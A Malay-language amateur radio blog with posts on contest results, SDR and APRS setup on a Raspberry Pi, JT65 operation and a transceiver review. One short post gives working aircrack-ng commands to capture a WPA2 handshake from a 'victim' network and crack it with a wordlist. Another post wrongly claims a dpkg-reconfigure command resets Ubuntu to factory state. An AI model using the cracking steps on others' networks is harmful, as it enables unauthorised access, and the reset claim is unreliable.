Monday, May 22, 2017

9m2mdx Great Dxer From Alor Gajah, Melaka


9m2mdx Nazmi adalah satu lagi tanda panggilan yang tidak asing lagi dalam dunia radio amatur. Khususnya dalam aktiviti radio contest. Beliau telah mendapat pelbagai kejayaan manis dalam arena radio sport ini. Bermula dengan callsign 9W2GSG, Beliau telah menyertai contest pertama beliau iaitu pada tahun 2013 dengan tanda panggilan 9M4SG dan memperoleh kejayaan manis iaitu mendapat tempat pertama di dalam Malaysia dan tempat kedua di dalam Asia bagi kategori Multi-Operator Multi-Transmitter dalam CQWW WPX 2013 SSB


kemudian, dengan berbekalkan pengalaman yang ditimba semasa menyertai pasukan 9M4SG, Nazmi 9W2GSG pada masa itu turut mencuba nasib beliau di dalam CQWW WPX 2014 SSB. Kali ini sebagai Single Operator Single Band Low dan memilih band 10m sebagai medan pertarungannya.
 
Dalam contest tersebut, beliau mendapat tempat kedua dalam Malaysia dan tempat ke 12 dalam Asia. Namun ianya tidak langsung mematahkan semangat beliau dalam arena ini. Dengan semangat darah pahlawan yang mengalir disetiap pembuluh darah beliau, Nazmi 9M2MDX pada masa itu berjaya menebusnya dengan mendapat tempat pertama di dalam CQWW 2014 SSB.
Beliau meneruskan kecemerlangan beliau lagi dalam CQWW CW 2014 dengan mendapat kedudukan pertama di dalam Malaysia bagi kategori Single Operator Low Power bagi band 10m.
Sehubungan dengan kejayaan beliau itu, Pengurus pasukan 9M2M iaitu 9M2GET Hairie telah meminang beliau dan membawa beliau ke Utara Semenanjung Malaysia bagi menyertai pasukan contest dari Arau iaitu 9M2M. Pilihan pengurus 9M2M memang tepat, Nazmi 9M2MDX telah berjaya membantu pasukan 9M2M di dalam contest CQWW CW 2015 dan melakar kejayaan manis dengan mendapat kedudukan pertama di dalam Malaysia.

Percaturan yang direncanakan oleh pengurus 9m2m itu amat tepat sekali. Pilihan mengambil 9M2MDX sebagai ahli keluarga 9M2M juga adalah satu keputusan yang paling tepat di dalam dunia. Memang sudah ditakdirkan yang 9M2MDX ini akan bertemu jodoh dengan 9M2M. Selain daripada pasukan 9M2M, Nazmi juga dengan penuh kecemerlangan membantu pasukan tanahair beliau sendiri iaitu 
9M2SI dan 9M4SG di dalam dua contest iaitu CQWPX SSB 2015 dan CQWW SSB 2015 dan berjaya mendapat tempat pertama bagi kedua-dua contest tersebut. Nampak tak kehebatan Nazmi... dimana sahaja ada Nazmi, disitu ada kejayaan. Kawan salute sama Nazmi Julaini 9M2MDX.


Aura kehebatan beliau diteruskan lagi, pada tahun 2016... Nazmi Julaini sekali lagi membantu pasukan 9M4SG di dalam CQ WPX 2016 SSB dan berjaya mendapat tempat pertama di dalam kategori Single Operator All Bands pada contest tersebut. Beliau sememangnya seorang operator radio yang cukup berpengalaman dan hebat di dalam dua mode sekaligus iaitu mode CW dan mode SSB. Memang terbukti kehebatan beliau. Kehebatan dan kecemerlangan beliau terus memuncak lagi dengan satu lagi kejayaan yang amat luar biasa.

9m2mdx
Kali ini di dalam Oceania Contest, Nazmi 9M2MDX telah mencoret satu kejayaan yang amat manis dan saya pasti ianya akan terpahat di dalam sanubari sampai bila-bila. Dalam contest tersebut, Nazmi telah mendapat tempat pertama di dalam Asia bagi kategori single operator 20m. Suatu kejayaan yang amat manis dan bermakna sekali. Amat bermakna bagi kami kerana #1 di dalam asia ini adalah kejayaan seorang anak muda dari Alor Gajah, Melaka dan ianya adalah hasil daripada tungkus lumus dan kesabaran beliau dalam menghadapi cabaran contest yang penuh dugaan dan cabaran ini.

Tahniah sekali lagi diucapkan kepada 9M2MDX di atas kejayaan beliau di dalam Oceania DX Contest 2016. Semoga kejayaan terus cium beliau bagi tahun-tahun yang akan mendatang. Teruskanlah kecemerlangan ini demi kelangsungan radio-sport Malaysia. Jika bukan anda, siapalah lagi. 73 9m2zak.

Tuesday, May 16, 2017

How to get a colored bash and change the title of the current terminal tab



buka teks editor,

sudo nano .bashrc

tambah dua line ini,

PS1='\[\033[1;36m\]\u\[\033[1;31m\]@\[\033[1;32m\]\h:\[\033[1;35m\]\w\[\033[1;31m\]\$\[\033[0m\] ' #colour



PROMPT_COMMAND='echo -en "\033]0;9m2zak Terminal\a"'      #terminal 
pada perkataan 9m2zak Terminal tu, tukarlah ke apa-apa perkataan pilihan anda

kemudian save dan

source .bashrc

tutup terminal dan buka balik, seelok-eloknya reboot pi3 anda. Have fun...


Monday, May 15, 2017

How to crack WPA2 WIFI using Raspberry Pi3

sudo apt-get -y install libssl-dev libnl-3-dev libnl-genl-3-dev ethtool

wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz
tar -zxvf aircrack-ng-1.2-rc4.tar.gz
cd aircrack-ng-1.2-rc4
sudo make
sudo make install

sudo airodump-ng-oui-update

sudo airmon-ng start wlan1

sudo airodump-ng --bssid xx:xx:xx:xx:xx -c X --write (nama wifi mangsa) wlan1mon

apabila dapat handshake, tekan crtl+c untuk hentikan, kemudian run

sudo aircrack-ng (nama mangsa)-01.cap -w ./yourwordlist.txt

tunggu hingga password muncul, proses ini memakan masa hingga 2 atau lebih jam.

Have fun....

Thursday, May 11, 2017

gnuradio running in VMWare Ubuntu 14.04

sudo apt-get update
sudo apt-get build-dep gnuradio
sudo apt-get install gnuradio gnuradio-dev gr-osmosdr librtlsdr-dev libuhd-dev libhackrf-dev libitpp-dev libpcap-dev git

cd ~
git clone git://op25.osmocom.org/op25.git
cd op25
mkdir build
cd build
cmake ../
make
sudo make install
sudo ldconfig

sudo nano /etc/modprobe.d/dvb-blacklist.conf
blacklist r820t
blacklist rtl2832
blacklist rtl2830

# ctrl+x to save and exit

sudo cp/etc/pulse/client.conf /etc/pulse/client.confbackup
sudo nano /etc/pulse/client.conf

edit the following line: from: ;autospawn = yes To: autospawn = no

Restart!

Create trunk.tsv
Create tg.tsv

Create scope.tsv

./scope.py --args rtl=0 -N LNA:46 -f 773.9687e6 -S 1024000 -q -1 -V -T trunk.tsv -2
chmod +x scope.sh

sumber rujukan : Matthew Lindstrom

Tuesday, May 9, 2017

Single Command to reinstall Ubuntu

untuk reinstall atau restore Ubuntu kembali ke factory install, pada terminal anda, run command ini.

sudo dpkg-reconfigure -phigh -a

Jangan lupa, backup semua data anda dahulu. Have fun!!!

Install pybombs

$ [sudo] pip install PyBOMBS
If you do want to install the latest version from git, but still use pip, you run the following command:
$ [sudo] pip install [--upgrade] git+https://github.com/gnuradio/pybombs.git
Add a list of recipes, e.g. by running
 $ pybombs recipes add gr-recipes git+https://github.com/gnuradio/gr-recipes.git  
 $ pybombs recipes add gr-etcetera git+https://github.com/gnuradio/gr-etcetera.git
Install GNU Radio, gr-osmosdr and some other goodies into your home directory ~/prefix:
 $ pybombs prefix init ~/prefix -a myprefix -R gnuradio-default
Run GNU Radio Companion from your new prefix:
 $ source ~/prefix/setup_env.sh
 $ gnuradio-companion

How to get a colored bash?

Open ~/.bashrc in any ur favourite text editor 
and uncomment line:
#force_color_prompt=yes
to be:
force_color_prompt=yes
save then execute source ~/.bashrc

contoh,
$ nano ~/.bashrc
#force_color_prompt=yes tukar ke
force_color_prompt=yes dan exit dan save.

Monday, May 1, 2017

Gqrx SDR for the Raspberry Pi 3


Hardware : Raspberry Pi 3, RTL SDR Dongle, 7 inci HDMI LCD Touch Screen

Langkah Pertama : 
pi@raspberrypi ~ $ sudo apt-get update
pi@raspberrypi ~ $ sudo apt-get upgrade
pi@raspberrypi ~ $ cat <no-rtl.conf
blacklist dvb_usb_rtl28xxu
blacklist rtl2832
blacklist rtl2830
EOF
pi@raspberrypi ~ $ sudo mv no-rtl.conf /etc/modprobe.d/

pi@raspberrypi ~ $ sudo apt-get install git-core
pi@raspberrypi ~ $ sudo apt-get install git
pi@raspberrypi ~ $ sudo apt-get install cmake
pi@raspberrypi ~ $ sudo apt-get install libusb-1.0-0-dev
pi@raspberrypi ~ $ sudo apt-get install build-essential

pi@raspberrypi ~ $ git clone git://git.osmocom.org/rtl-sdr.git
pi@raspberrypi ~ $ cd rtl-sdr/
pi@raspberrypi ~/rtl-sdr $ mkdir build
pi@raspberrypi ~/rtl-sdr $ cd build
pi@raspberrypi ~/rtl-sdr/build $ cmake ../ -DINSTALL_UDEV_RULES=ON
pi@raspberrypi ~/rtl-sdr/build $ make
pi@raspberrypi ~/rtl-sdr/build $ sudo make install
pi@raspberrypi ~/rtl-sdr/build $ sudo ldconfig
pi@raspberrypi ~/rtl-sdr/build $ cd ~
pi@raspberrypi ~ $ sudo cp ./rtl-sdr/rtl-sdr.rules /etc/udev/rules.d/
pi@raspberrypi ~ $ sudo reboot

pi@raspberrypi ~ $ rtl_test
Found 1 device(s):
  0:  Generic, RTL2832U, SN: 77771111153705700

Using device 0: Generic RTL2832U
Found Rafael Micro R820T tuner
Supported gain values (29): 0.0 0.9 1.4 2.7 3.7 7.7 8.7 12.5 14.4 15.7 16.6 19.7 20.7 22.9 25.4 28.0 29.7 32.8 33.8 36.4 37.2 38.6 40.2 42.1 43.4 43.9 44.5 48.0 49.6
Sampling at 2048000 S/s.

Info: This tool will continuously read from the device, and report if
samples get lost. If you observe no further output, everything is fine.

Reading samples in async mode...
Langkah kedua,
$ sudo apt-get update
$ sudo apt-get upgrade
   (reboot if necessary)
$ sudo apt-get install libqt5gui5 libqt5core5a libqt5network5
$ sudo apt-get install libqt5widgets5 libqt5svg5 libportaudio2
$ wget https://github.com/csete/gqrx/releases/download/v2.6/gqrx-2.6-rpi3-2.tar.xz
$ tar xvf gqrx-2.6-rpi3-2.tar.xz
$ cd gqrx-2.6-rpi3-2
$ ./setup_gqrx.sh
Siap... untuk run gqrx, sila ke /home/pi/gqrx-2.6-rpi3-2
dan right klik pada file run_gqrx.sh. Selepas itu, dalam kotak 
command line to execute: taip /home/pi/gqrx-2.6-rpi3-2/run_gqrx.sh
tick juga Excute in terminal emulator. Selepas itu klik OK. Dan siaplah.
video dibawah ini adalah hasilnya, jika ada sebarang masalah, boleh komen pada 
ruangan komen dibawah.

sumber rujukan : http://gqrx.dk/download/gqrx-sdr-for-the-raspberry-pi

Saturday, April 29, 2017

Thursday, April 27, 2017

Raspberry Pi 3 APRS IGate : Secara asasnya.


Kali ini, saya menggunakan Raspberry Pi sebagai platform utama bagi projek IGate. Sebelum ini saya menggunakan PC untuk tujuan tersebut, kali ini saya cuba pula dengan Pi 3. Saja suka-suka, Bagi yang ingin mencubanya di bawah ini saya sertakan langkah-langkahnya.

Langkah pertama, update firmware dahulu.

sudo apt-get update
sudo apt-get dist-upgrade
sudo rpi-update
sudo reboot

Langkah kedua, install libasound2.dev

sudo apt-get install libasound2-dev

Langkah ketiga, download Dire Wolf

cd ~
git clone https://www.github.com/wb2osz/direwolf
cd direwolf

untuk dapatkan version yang paling stabil bagi Dire Wolf, taip

git tag

kemudian akan keluar senarai version yang ada, jika tidak tahu nak pilih yang mana satu, taip 

git checkout dev

Langkah keempat, compile dan install

cd ~/direwolf
make
sudo make install
make install-rpi
make install-conf

Langkah kelima, percubaan pertama, taip

cd ~
direwolf

sepatutnya paparan seperti di bawah ini, akan kelihatan, jika tidak, sila ulangi langkah pertama kembali.

Dire Wolf version …
Audio device for both receive and transmit: default
Could not open audio device default for input
No such file or directory
Pointless to continue without audio device.

jika paparan diatas kelihatan, ini bermakna anda sudah pun berjaya dan mari kita teruskan setup kita.

Langkah keenam, audio input / output

Sebenarnya Raspberry Pi sudah ada built-in output audio tetapi untuk input, ianya tidak ada. Tiada audio input. Untuk memastikannya ada atau tidak output audio devices pada Pi3, taip ini pada terminal

aplay -l

paparan ini akan kelihatan,

 **** List of PLAYBACK Hardware Devices ****
card 0: ALSA [bcm2835 ALSA], device 0: bcm2835 ALSA [bcm2835 ALSA] 
Subdevices: 8/8
 Subdevice #0: subdevice #0
 Subdevice #1: subdevice #1
 Subdevice #2: subdevice #2
 Subdevice #3: subdevice #3
 Subdevice #4: subdevice #4
 Subdevice #5: subdevice #5
 Subdevice #6: subdevice #6
 Subdevice #7: subdevice #7
card 0: ALSA [bcm2835 ALSA], device 1: bcm2835 ALSA [bcm2835 IEC958/HDMI]
 Subdevices: 1/1
 Subdevice #0: subdevice #0

Jadi nampaknya memang sahlah ada output audio. Mari kita semak samada ada atau tidak input audio device yang built-in bagi Pi3 ini, untuk itu, taip ini pada terminal

arecord -l

saya percaya, paparan ini akan muncul,

**** List of CAPTURE Hardware Devices ****

Jadi bermakna sahlah tiada audio input device, Maka disini saya cadangkan kepada rakan-rakan guna USB sound card. Macam saya, saya guna C-Media USB Sound Card. Gambar dibawah

kemudian cucuk usb external sound card ini pada Pi3 anda, dan untuk memastikan yang ianya dikesan, taip semula 

arecord -l

sepatutnya paparan ini akan kelihatan,

**** List of CAPTURE Hardware Devices ****
card 1: CODEC [USB Audio CODEC], device 0: USB Audio [USB Audio] 
Subdevices: 1/1
Subdevice #0: subdevice #0

jika nampak paparan di atas, maknanya oklah tu.

Langkah ketujuh : direwolf.conf

Kali ini, kita setup callsign kita, kedudukan station kita seperti long-lat, server aprs, beacon dan pelbagai lagi perkara berkaitan dengan IGate kita. Untuk itu, ianya perlu di edit pada file direwolf.conf. Fili ini berada di 

/home/pi/direwolf.conf

buka file direwolf.conf dan edit pada bahagian yang saya hitamkan itu, tapi jangan hitamkan pula dalam file tu, ni hanya utk panduan


#
# Sample configuration for SDR read-only IGate.
#

# We might not have an audio output device so set to null.
# We will override the input half on the command line.
ADEVICE null null
CHANNEL 0

# Put your callsign in place of xxx below.
MYCALL XXX

# Pick appropriate servers for your geographical region.
#
#      noam.aprs2.net    - for North America
#      soam.aprs2.net     - for South America
#      euro.aprs2.net      - for Europe and Africa
#      asia.aprs2.net       - for Asia
#      aunz.aprs2.net      - for Oceania
#
# Change the following line if you are not in North America.
IGSERVER asia.aprs2.net

# You also need to specify your login name and passcode.
# This is the same passcode you would use with any other IGate
# application. Contact the author if you can't figure out
# how to generate the passcode.

IGLOGIN XXX 123456

# That's all you need for a receive only IGate which relays

# messages from the local radio channel to the global servers.

Gantikan dengan callsign sendiri siap dengan SSID pada XXX dan pada 123456 tu, gantikan ia dengan passcode anda sendiri.

Langkah kelapan : Ujian sebenar

Dengan menggunakan handy/mobile rig/scanner 2m band anda. Cucuk kabel stereo ke speaker handy/mobile rig/scanner anda dan tune ke 144.390mhz. Hujung stereo kabel satu lagi anda cucuk pada MIC External USB Sound Card anda. Kini anda sudah bersedia untuk ke udara.

reboot Pi 3, dan pada terminal, taip

cd ~
direwolf

Jika paparan lebih kurang macam ini kelihatan, anda sudah pun berjaya. Jika tak, sila ulang langkah pertama




Semoga posting kali ini memberi manfaat kepada kita. 73 Zaki 9M2ZAK



My new DXCC #231 : A25UK from Botswana


Kejadian baru berlaku 15 minit yang lalu, sebenarnya daripada petang tadi kawan memburu callsign ini. Dengan penuh kesabaran memanggil di 18073.00 mhz. Akhirnya kesabaran kawan mendapat pulangannya. Tiba-tiba callsign kawan dipanggil olehnya. Sungguh tidak disangka kerana pada ketika itu, A25UK ini mendapat pileup yang hebat dari station Jepun dan mereka pula datang dengan kuasa tinggi (BIG GUN). Namun dengan berbekalkan sedikit ketabahan dan kesabaran, ianya berhasil dan menambahkan lagi bilangan DXCC kawan, iaitu menjadi #231 DXCC. Bagi yang belum mendapat lagi, jangan risau kerana mereka akan ke udara dari 25 April hingga 5 May 2017, dalam mode phone, cw dan rtty dari 160m hingga 10m. Selamat memburu...73 Zaki

27/4/2017 12:45:12 UTC / A25UK / 18073.00 / CW / 599 599  

Sunday, April 23, 2017

Worked with TC571SAV, callsign istimewa untuk memperingati kelahiran Nabi Muhammad (SAW)


TC571SAV to Commemorate the Birth of Prophet Muhammed (SAV)

Malam tadi semasa DX, kawan dihubungi oleh sebuah station dari Turki, selepas kawan semak di QRZ.com, ternyata ianya adalah sebuah callsign istimewa. Istimewa kerana di dalam callsign tersebut ada maksudnya iaitu 571. Seperti mana yang kita maklum 571 itu merujuk kepada tahun kelahiran Nabi Muhammad SAW, iaitu 20 April 571 Masihi bersamaan dengan 12 Rabiul Awal Tahun Gajah


TC571SAV adalah sebuah callsign istemewa untuk memperingati kelahiran Nabi Muhammad SAW yang di uruskan oleh Abdul Kadir TA3AER yang bertapak di Balikesir, Turki. Signal kedua-dua station itu kuat dan berjaya menindan barisan callsign-callsign semasa kawan pile-up malam tadi. Semoga Abdul Kadir TA3AER sentiasa dilindungi dan dirahmati oleh ALLAH SWT. 73 zaki




TA3AER

Saturday, April 15, 2017

CQMM DX 2017 Contest


Menerima jemputan dari Ed, PY4WAS iaitu Presiden kelab CWJF untuk sertai contest anjuran mereka iaitu sebuah kelab radio dari Brazil, iaitu CWJF Group. Jadi sebagai seorang kawan, saya memenuhi jemputan dia. CQMM DX ini akan bermula sebentar lagi, iaitu jam 8.00 malam waktu tempatan hingga jam 7.59 pagi hari Isnin nanti.

                                                                  Selamat Berjuang


Friday, April 14, 2017

Russian Meteor M2 Satelite Image : 15 April 2017


QYT KT-8900D : Review from Kulai


Pada posting kali ini, saya ingin berbicara mengenai sebuah VHF/UHF transceiver keluaran syarikat Fujian Nanan Quan Yi Electronics Co., Pada kali ini, saya ingin berbicara tentang model QYT-KT-8900D. Model ini pada masa kini mendapat perhatian yang menggalakkan daripada peminat band 2m dan juga 70cm. Ini adalah kerana keupayaannya yang boleh Dual Band iaitu VHF dan UHF dan yang paling menarik sekali ialah keupayaannya untuk standby empat freq sekaligus. Nak lebih ranggi lagi, disebut Quad-standy serta mempunyai paparan jenis LCD dan boleh ditukar kepada 9 warna mengikut selera anda, iaitu Black, White, Red, Blue, Green, Yellow, Indigo, Purple dan Gray. Wow!!!


QYT-8900D ini mempunyai keupayaan memancar pada 20w dan boleh dinaikkan ke 25w maksimun. Ianya juga mempunyai port untuk external speaker. Namun oleh kerana audionya yang kuat, saya rasa external speaker tidak perlu kut. Audionya kedengaran agak treble sikit, namun itu bukanlah satu masalah kerana ketajaman audionya itu sebenarnya banyak membantu kita mendengar dengan lebih baik jika si kecil ini dipasangkan di dalam kereta atau lori atau bas atau sebagainya. Freq bagi band 2m ialah 136mhz hingga 174mhz, manakala bagi band 70cm plak, ianya bermula dari 400mhz hingga 480mhz. Paparan hadapan transceiver comel ini amat menarik sekali, dimana apabila kita hidupkan ia (knob sebelah kiri) Perkataan Welcome KT-8900D akan kelihatan. Manakala apabila dimatikan, paparan Goodbye akan menjelma sebelum ianya terus padam.


Butang FM yang berada di sebelah kanan itu pula akan membawa kita terus ke freq Radio FM Tempatan seperti HotFM dan sebagainya. Tetapi yang menariknya, paparan 4 freq yang kita sedang monitor tadi masih ada dibahagian atasnya. Rig ini juga mempunyai keupayaan untuk diprogramkan melalui komputer. Pada bahagian belakangnya, ada disediakan port untuk Data. Untuk memastikan yang rig ini sentiasa sejuk, kipas juga disediakan pada bahagian belakangnya. 


Oleh kerana kuasa pemancarannya sekitar 20w hingga 25w. Jadi disini saya sarankan rakan-rakan semua sediakan power supply yang mempunyai nilai amp yang tinggi. Audio TXnya pula adalah baik, dimana audio saya jelas kedengaran dan tiada distortion. Untuk memory pula, kita boleh simpan maksimun 200 memory. Jadi... makna kata (gaya orang Perlis cakap) kita boleh simpan semua freq Simplex Channel dan juga semua freq repeater di seluruh Malaysia. Lupa nak bagitau, rig ini ada dua pilihan bahasa, iaitu bahasa inggeris dan juga bahasa Chinese. Apabila anda membeli transceiver ini, anda akan dibekalkan dengan senarai peralatan berikut:

1 x Microphone
1 x Car Power Cable
1 x Clip untuk Mic
1 x Mounting Braket
1 x bungkus skru
1 x buku manual dalam bahasa inggeris


                           

Jadi secara keseluruhannya. Saya amat berpuashati dan tertarik dengan transceiver ini dan sememangnya ianya akan kekal berada dalam mobile kawan kerana ianya kecil, mudah untuk install dimana celah sekalipun, audionya yang baik, boleh monitor 4 freq sekaligus, jadi boleh moni 4 repeater sekaligus. Sudah pasti urusan untuk lompat ke repeater-repeater yang akan jadi lebih mudah serta menambahkan lagi keceriaan perjalanan kita dengan paparan yang berwarna-warni itu.   
                                                       
                                                            73 9M2ZAK Zaki, Kulai, Johor

Monday, April 10, 2017

Ragchew : Mencari masa yang sesuai untuknya.

Ragchew ini adalah satu lagi aktiviti yang menarik dalam radio amatur. Dimana dengan aktiviti ini, kita dapat mengenali dengan lebih rapat lagi rakan-rakan kita dari seluruh dunia. Bertukar-tukar pendapat, berbincang mengenai antenna yang digunakan, berbicara mengenai setting atau menolong rakan setting radio dan audio mereka.

Aktiviti ini sebenarnya amat bagus sekali. Namun kita perlu ingat, keadaan band juga perlu diambil kira. Tidak semua masa  adalah sesuai untuk ragchew, ada masa dan ketikanya juga.

Jadi persoalannya disini ialah.... bagaimana kita hendak tahu yang station itu bersedia untuk bersembang atau tidak?

Apakah masa yang terbaik untuk kita ragchew dan band apakah yang sesuai?

Masa yang sesuai untuk aktiviti ini adalah sekitar hari Isnin hingga Jumaat. Dimana pada sekitar hari tersebut, keadaan band tidak sibuk dengan aktiviti contest. Jika kita lihat jadual contest, hampir setiap minggu akan ada aktiviti contest dan yang pastinya...band akan sesak.

Namun, jika kita terlalu sibuk dengan urusan dan kerja pada sekitar hari tersebut, kita jangan risau...kita masih lagi boleh menikmati aktiviti ragchew ini dengan menyusun beberapa strategi ini, antaranya ialah...

- Jika pada hujung minggu tersebut ada contest, maka kita boleh pindah ke WARC band kerana contest tidak dibenarkan pada band ini.

-Kadangkala,  ada contest yang hanya pertandingkan satu mode sahaja. Jadi jika  pada hari itu ada contest dalam mode CW, maka kita pergi bersembanglah pada mode phone, dan jika contest itu berlangsung pada mode phone...kita ragchew-lah pada mode cw.

Masa yang terbaik untuk ragchew adalah ketika band membuka dengan cantik. Membuka dengan cantik ini membawa maksud yang band itu mencatat kadar noise yang rendah, iaitu sekitar S0 ke S2, tidak berlaku fenomena skip, iaitu kita mendengar dua-dua atau semua station sekaligus serta tidak QSB, iaitu signal tidak tenggelam timbul.

Disamping itu juga, pastikan kita memancar dengan kuasa yang mencukupi agar rakan kita dapat terima signal kita dengan sempurna.

Ragchew tidak sesuai bagi station yang QRP dan Mobila, ini adalah kerana...bagi QRP station, ianya adalah lebih kepada esperimen dan begitu juga dengan mobile station.

Masa yang tidak sesuai untuk aktiviti ragchew adalah ketika matahari terbit dan juga matahari terbenam. Pada ketika ini, band berubah dengan drastik sekali dan membuka dengan luas. Maka ianya sesuai untuk aktiviti DX.

Untuk menikmati aktiviti ragchew dengan lebih sempurna. Pastikan anda sudah pun menguasai sepenuhnya transceiver anda, tahu menggunakan filter, tahu bagaimana untuk mengurangkan noise dan QRM serta memahami setiap fungsi yang disediakan oleh pengeluar radio anda. Dengan ini,aktiviti ragchew anda akan lebih berkesan.

Katakan pada malam itu, anda ingin ke udara tetapi bukannya untuk DX. Anda ingin bersantai-santai di depan radio sambil menikmati sebungkus kuaci dan kopi O panas. Maka bagaimanakah caranya kita hendak mengenal pasti station yang CQ itu bersedia untuk ragchew atau sekadar CQ DX? Untuk itu....terdapat beberapa kriteria yang membolehkan kita tahu apa objektif CQ-nya.

Cara yang pertama ialah dengan mendengar cara dia CQ. Selalunya orang yang ingin mencari rakan untuk diajak bersembang akan CQ dengan nada yang santai dan relax serta memancar dengan kuasa yang agak besar supaya orang dapat copy signalnya dengan baik dan tidak mahu menyusahkan orang untuk copy signalnya.

Cara yang kedua ialah dengan meneliti ayat CQ-nya. Kadangkala ada station yang ubah ayat CQ dengan menyebut lebih spesifik seperti CQ VK, contohnya seperti berikut.

CQ VK CQ VK this is 9M2KDX calling CQ and listening.

Maknanya disini, 9m2kdx sedang mencari stesen dari Australia untuk diajak bersembang. Mungkin 9M2KDX pada masa itu ingin mencari kenalan dari sana.

Jika kedengaran ada station yang CQ DX, maka fahamlah kita yang dia pada masa itu sedang melakukan aktiviti pemburuan iaitu sedang memburu DXCC. Kita juga boleh masuk...cukup sekadar bertukar rst say hai sudahlah... jangan ganggu dia, biarkan dia teruskan aktiviti pemburuannya.

CQ DX ini selalunya ada objektif....seperti ingin mendapatkan dxcc dari seluruh dunia. Bagi seorang Dxer, beliau akan menetapkan masa aktiviti DX beliau. Contohnya...dia akan CQ DX dari pukul 8pagi hingga 10pagi kerana pada masa itu...band membuka ke Amerika Utara.

Aktiviti ragchew ini sebenarnya memberi kita banyak info dan input yang berguna. Contohnya, perkara yang berkaitan dengan teknikal. Kita boleh bertukar-tukar pendapat dan pengalaman berkaitan dengan antenna seperti apakah antenna yang kita gunakan itu, bagaimana memasangnya....bagaimana prestasinya. Lebih manis lagi jika antenna itu adalah homebrew. Kita boleh berkongsi ilmu pengetahuan berkaitan antenna yang kita buat itu dan ilmu yang bermanfaat akan memberi kebaikan kepada semua.

Aktiviti ragchew ini juga sebenarnya memberi kelebihan kepada SWL, dimana mereka ini boleh menjadi pendengar dan secara tidak langsung dapat juga input daripada perbualan antara dua station itu. Banyak input sebenarnya apabila dua atau  lebih station yang berbincang mengenai sesuatu topik.

Baiklah...saya sudahi posting saya pada setakat ini sahaja dahulu. Semoga paparan kali ini memberi manfaat dan pencerahan yang seterangnya berkaitan dengan aktiviti ragchew ini. 73

Saturday, April 8, 2017

JT65-HF setup with BD7JAD Link5 Interface

Assalamualaikum dan selamat sejahtera serta selamat berhujung minggu diucapkan kepada semua rakan radio amatur yang bertaburan di seluruh tanahair mahupun di seluruh dunia. Semoga kalian semua berada dalam keadaan sihat walafiat disamping keluarga yang tercinta dan juga semoga segala urusan seharian kalian dipermudahkan hendaknya.

Pada paparan kali ini, saya ingin berbicara mengenai satu mode digital dalam Radio Amatur, iaitu tidak lain tidak bukan JT-65. Mode JT-65 ini sama juga seperti mode-mode lain iaitu PSK31 dan juga RTTY dimana ianya memerlukan interface antara transceiver anda dan juga komputer. Kelebihan utama mode ini ialah ianya dapat bekerja dengan baik walaupun keadaan band pada ketika itu tidak beberapa cantik dari segi noise level dan juga keadaan propogation. Yang menariknya, mode JT-65 ini hanya memerlukan kuasa maksimun sebanyak 10w dan kalian semua sudah boleh menjelajah dunia ini seadanya.

Baiklah, tanpa membuang masa lagi. Marilah kita setup mode ini pada shack kita. 

Pertama sekali ialah memuat-turun perisian JT65. Saya menggunakan perisian dari laman web ini, iaitu  JT65-HF version 1.0.93(latest Version) Anda boleh klik pada link yang tersebut untuk mendapatkannya. 

Setelah selesai muat-turun. Sila install JT65 anda. Setelah selesai, terus pergi ke setup dan paparan ini akan muncul.
Sila isikannya dengan butiran masing-masing seperti Callsign, Grid Locator dan Sound input serta output device. Manakala pada bahagian lain, biarkan standard.

Kemudian, pergi pula ke bahagian Rig Control/PTT, 

Isikan port masing-masing pada ruangan PTT Port, Dalam kes saya, saya menggunakan COM1. Anda boleh semak COM anda pada Device Manager. Manakala pada bahagian lain, jangan kacau. Biarkan standard. Kemudian pergi ke RB and PSKR.

isikan sekali lagi callsign anda pada ruangan Call for Reporter or RB dan juga pada ruangan Antenna Description for PSK Reporter. Isi ikut setup masing-masing. Kemudian...pada bahagian Macros, Colors dan Diagnostics saya tidak isi dan kacau apa-apa. Hanya tinggalkan kosong dan standard sahaja.

ok...siap sudah setup pada bahagian software. Kemudian sila setup bahagian audio pula. Pada bahagian audio PC anda, sila jadikan USB Mic/C-media Mic itu sebagai Default. Begitu juga pada bahagian Playback, jadikan Speakers (USB Pnp atau C-media) sebagai defaults.

Setelah selesai, save dan sepatutnya ianya akan jadi seperti sebegini.


Sila adjust volume Mic dan Volume transceiver anda sehingga background anda menjadi seperti gambar diatas. Dan jika ada aktiviti, waterfall hijau itu akan kelihatan.

Untuk TX, pertama sekali, setkan freq dahulu iaitu dengan double klik pada ruangan Dial QRG KHz, dan paparan ini akan kelihatan. Saya memilih 14076 iaitu band 20m dan pada transceiver, freq 14076.00 juga disetkan. Jangan lupa set mode USB.

Baiklah, sekarang kita sudah pun sedia untuk TX. Sebelum TX, pastikan antenna kita di-tune dahulu dan yang penting sekali adalah pastikan output power tidak melebihi 10 watt. Mode JT65 ini, agak istimewa sedikit, dimana ianya 100% bergantung kepada masa dan ada 3 fasa, iaitu masa RX ( 49 saat), kemudian TX (49 saat) dan kemudian RX untuk confirm (49 saat lagi). Dan semuanya perlu ikut masa dengan tepat. Jika kita tidak ikut masa, ianya tidak akan jadi


Operasi JT65 - 

Langkah 1 - Klik butang Call CQ dan perkataan CQ 9M2ZAK OJ11 akan muncul dalam kotak TX Generated, kemudian tunggu sehingga jam mencapai saat sifar. sebaik sahaja saat menjadi sifar, klik butang Enable TX dan kita sepatutnya TX selama 49 saat. dan tekan butang Halt TX apabila masa sudah capai 50 saat dan tunggu sehingga panggilan kita dijawab. Jika ada respon, ianya akan kelihatan sebegini.


Langkah 2 - kemudian tunggu sehingga habis kitaran 49 saat RX, dan double klik pada kawasan merah itu, dimana pada masa itu stesen UA3RLE dan UR9QC sedang memanggil kita. Kita respon balik dengan double klik sahaja pada kawasan merah sebaik sahaja masa melebihi 49 saat dan ianya akan kelihatan sebegini. saya pilih UA3RLE dahulu.



Langkah 3 - sebaik sahaja selesai TX, tekan butang Halt TX untuk mengelakkan ianya akan terus tx pada pusingan seterusnya. kemudian tunggu dan jika dia respon, paparan ini akan kelihatan



Langkah 4 - kemudian tekan SEND RRR selepas kitaran seterusnya, dan jika berjaya. Dia akan membalasnya seperti paparan dibawah ini pada kitaran seterusnya.


Langkah 5 - Apabila kelihatan RRR73 atau RRR, ini bermakna dia menerima pancaran kita dan contact telah berlaku. Jadi, seterusnya kita logkan QSO tadi dengan klik butang Log QSO dan klik Log Contact And Close This Window



Kemudian untuk ulangi atau sambung CQ, sila ulangi langkah 1 semula. Dan proses ini berulang-ulang untuk QSO seterusnya.

